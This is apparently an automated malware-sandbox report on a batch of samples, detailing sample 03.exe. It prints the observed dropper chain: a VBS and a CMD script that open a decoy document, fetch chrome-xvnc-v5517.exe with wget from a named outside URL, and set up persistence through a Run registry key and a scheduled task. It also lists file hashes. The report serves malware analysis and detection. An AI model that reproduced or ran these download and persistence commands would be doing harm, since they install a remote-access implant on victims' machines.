Overview
overview
10Static
static
1001/2015.5.27/01.vir
windows7_x64
301/2015.5.27/01.vir
windows10_x64
3PER-DCOMP-...ao.dll
windows7_x64
1PER-DCOMP-...ao.dll
windows10_x64
101/2015.5.27/03.exe
windows7_x64
801/2015.5.27/03.exe
windows10_x64
801/2015.5.27/04.exe
windows7_x64
101/2015.5.27/04.exe
windows10_x64
101/2015.5.27/05.exe
windows7_x64
1001/2015.5.27/05.exe
windows10_x64
1001/2015.5.27/07.exe
windows7_x64
701/2015.5.27/07.exe
windows10_x64
701/2015.5.27/09.exe
windows7_x64
1001/2015.5.27/09.exe
windows10_x64
1001/2015.5.27/10.exe
windows7_x64
1001/2015.5.27/10.exe
windows10_x64
1001/2015.5.27/12.pdf
windows7_x64
101/2015.5.27/12.pdf
windows10_x64
101/2015.5.27/13.pdf
windows7_x64
101/2015.5.27/13.pdf
windows10_x64
101/2015.5.27/14.exe
windows7_x64
801/2015.5.27/14.exe
windows10_x64
801/2015.5.27/15.dll
windows7_x64
101/2015.5.27/15.dll
windows10_x64
101/2015.5.27/16.rtf
windows7_x64
1001/2015.5.27/16.rtf
windows10_x64
101/2015.5.27/17.pdf
windows7_x64
101/2015.5.27/17.pdf
windows10_x64
101/2015.5.27/18.doc
windows7_x64
101/2015.5.27/18.doc
windows10_x64
1Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
28-01-2022 13:34
Behavioral task
behavioral1
Sample
01/2015.5.27/01.vir
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
01/2015.5.27/01.vir
Resource
win10-en-20211208
Behavioral task
behavioral3
Sample
PER-DCOMP-Intimacao.dll
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
PER-DCOMP-Intimacao.dll
Resource
win10-en-20211208
Behavioral task
behavioral5
Sample
01/2015.5.27/03.exe
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
01/2015.5.27/03.exe
Resource
win10-en-20211208
Behavioral task
behavioral7
Sample
01/2015.5.27/04.exe
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
01/2015.5.27/04.exe
Resource
win10-en-20211208
Behavioral task
behavioral9
Sample
01/2015.5.27/05.exe
Resource
win7-en-20211208
Behavioral task
behavioral10
Sample
01/2015.5.27/05.exe
Resource
win10-en-20211208
Behavioral task
behavioral11
Sample
01/2015.5.27/07.exe
Resource
win7-en-20211208
Behavioral task
behavioral12
Sample
01/2015.5.27/07.exe
Resource
win10-en-20211208
Behavioral task
behavioral13
Sample
01/2015.5.27/09.exe
Resource
win7-en-20211208
Behavioral task
behavioral14
Sample
01/2015.5.27/09.exe
Resource
win10-en-20211208
Behavioral task
behavioral15
Sample
01/2015.5.27/10.exe
Resource
win7-en-20211208
Behavioral task
behavioral16
Sample
01/2015.5.27/10.exe
Resource
win10-en-20211208
Behavioral task
behavioral17
Sample
01/2015.5.27/12.pdf
Resource
win7-en-20211208
Behavioral task
behavioral18
Sample
01/2015.5.27/12.pdf
Resource
win10-en-20211208
Behavioral task
behavioral19
Sample
01/2015.5.27/13.pdf
Resource
win7-en-20211208
Behavioral task
behavioral20
Sample
01/2015.5.27/13.pdf
Resource
win10-en-20211208
Behavioral task
behavioral21
Sample
01/2015.5.27/14.exe
Resource
win7-en-20211208
Behavioral task
behavioral22
Sample
01/2015.5.27/14.exe
Resource
win10-en-20211208
Behavioral task
behavioral23
Sample
01/2015.5.27/15.dll
Resource
win7-en-20211208
Behavioral task
behavioral24
Sample
01/2015.5.27/15.dll
Resource
win10-en-20211208
Behavioral task
behavioral25
Sample
01/2015.5.27/16.rtf
Resource
win7-en-20211208
Behavioral task
behavioral26
Sample
01/2015.5.27/16.rtf
Resource
win10-en-20211208
Behavioral task
behavioral27
Sample
01/2015.5.27/17.pdf
Resource
win7-en-20211208
Behavioral task
behavioral28
Sample
01/2015.5.27/17.pdf
Resource
win10-en-20211208
Behavioral task
behavioral29
Sample
01/2015.5.27/18.doc
Resource
win7-en-20211208
Behavioral task
behavioral30
Sample
01/2015.5.27/18.doc
Resource
win10-en-20211208
General
-
Target
01/2015.5.27/03.exe
-
Size
624KB
-
MD5
0744320b256d9f8ebf7387982f8efd3d
-
SHA1
e103e00c907ecead188a9b6a589f84ed13add671
-
SHA256
467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49
-
SHA512
c71c13322d0af3303cd400155f9ea4fec27ccb2ebf4f74132b86f98cdebb79e9a8f58ac2208ece478a973d73f80e0e440d3682f41580fe04c2ab9a26dc5dd406
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
wget.exepid process 532 wget.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\wget.exe upx \Users\Admin\AppData\Local\Temp\wget.exe upx C:\Users\Admin\AppData\Local\Temp\wget.exe upx \Users\Admin\AppData\Local\Temp\wget.exe upx -
Loads dropped DLL 2 IoCs
Processes:
cmd.exepid process 304 cmd.exe 304 cmd.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrome-xvnc-v5517 = "C:\\Windows\\system32\\cmd.exe /c start /b C:\\Users\\Admin\\AppData\\Roaming\\Treams\\chrome-xvnc-v5517.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
03.exeWScript.execmd.exedescription pid process target process PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 1536 wrote to memory of 544 1536 03.exe WScript.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 544 wrote to memory of 304 544 WScript.exe cmd.exe PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 824 304 cmd.exe chcp.com PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 1796 304 cmd.exe notepad.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 532 304 cmd.exe wget.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1080 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1740 304 cmd.exe schtasks.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1100 304 cmd.exe cmd.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1104 304 cmd.exe find.exe PID 304 wrote to memory of 1052 304 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe"C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tron.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c tron.cmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\AppData\Local\Temp\SystemsErrorOpeningTheDocumentMicrosoftOfficeOfFri 01/28/2022.doc"4⤵
-
C:\Users\Admin\AppData\Local\Temp\wget.exewget.exe -N http://prestigeclub.frantov.com.ua/press-center/press/chrome-xvnc-v5517.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn ChromeUpdates_ups /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn Trons_ups /f4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\SysWOW64\find.exefind "Microsoft Windows XP"4⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome-xvnc-v5517 /t REG_EXPAND_SZ /d "C:\Windows\system32\cmd.exe /c start /b C:\Users\Admin\AppData\Roaming\Treams\chrome-xvnc-v5517.exe" /f4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn Trons_ups /TR "C:\Users\Admin\AppData\Roaming"\Treams\chrome-xvnc-v5517.exe /SC MINUTE /mo 1804⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tron.cmdMD5
262777e5e1da79784c08acbb2002c169
SHA1f24eaca19cac7b72a95f116690330b477df4bb04
SHA256068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa
SHA51216f678aad5de8847cb065e828bbf14913383bdc4910fdbca1b21cc16f7b0d859260546ae68fc3739b199d878116e10c5dc5995f5379c51335af8c382849f1285
-
C:\Users\Admin\AppData\Local\Temp\tron.vbsMD5
3b8cdcc376903e45eeca70d2c6a3c435
SHA1379a2959a263c74fbc7d6dec98ceab9700d77742
SHA25642b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988
SHA512a331e2237be54e496220cf335d52810036fdf21eecc3eb5cb08ced6add348d9a54da8e032e67e7d52d9e6fbe1fe46b0f829306fb50f351606f4b6126fb5faa12
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
memory/304-66-0x0000000000440000-0x0000000000441000-memory.dmpFilesize
4KB
-
memory/1536-54-0x0000000075D51000-0x0000000075D53000-memory.dmpFilesize
8KB